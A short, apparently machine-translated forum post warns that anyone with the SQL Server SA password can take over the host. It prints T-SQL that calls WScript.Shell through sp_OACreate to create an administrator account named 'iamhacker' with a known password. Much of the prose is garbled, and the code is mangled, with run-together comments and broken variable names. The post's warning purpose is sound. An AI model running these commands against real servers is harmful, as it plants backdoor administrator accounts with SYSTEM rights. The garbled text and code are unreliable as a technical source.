SQL Server has a very serious security hazard. The SA's password is as important as the password of Administrator.
If others get the password of the database superuser SA, then he / she can use the SQL statement below to use the SQL statement in the query analyzer to create a super user on Win2000 (SQL Server):
declare @object int-- create WScript.ShellEXEC sp_OACreate 'WScript.Shell', @ object OUT-- run net user iamhacker opendoor / add-- add a name for iamhacker, password opendoor user EXEC sp_OAMethod @ object, 'Run' , NULL, 'net user iamhacker opendoor / add' - iamhacker added to the Administrators group EXEC sp_OAMethod @ object, 'Run', NULL, 'net localgroup Administrators iamhacker / add' - iamhacker removed from the User group EXEC sp_OAMethod @ Object, 'Run', NULL, 'NET LOCALGROUP USERS IAMHACKER / DEL'
I have tried it. . It's too horrible.
The above statement is very short. The core is able to call the platform command NET.
It is the fact that the method is the powerful function of SQL Server calls COM Automation. A method of re-cooperating an object WScript.Shell in WSH: RUN. (Note that general SQL Server is configured to run under the SYSTEM permission. That is, the programs called by RUN are also permissions with System.)
(Related experiments, calling NotePad, then there will be users under the NOTEPAD.exe process for users under the task manager)
The hidden dangers of WScript.Shell have been significantly significant in various respects. I don't think there is a related issue on SQL Server now.
and so. Everyone must pay attention to the password of the SA. Don't be black. . .
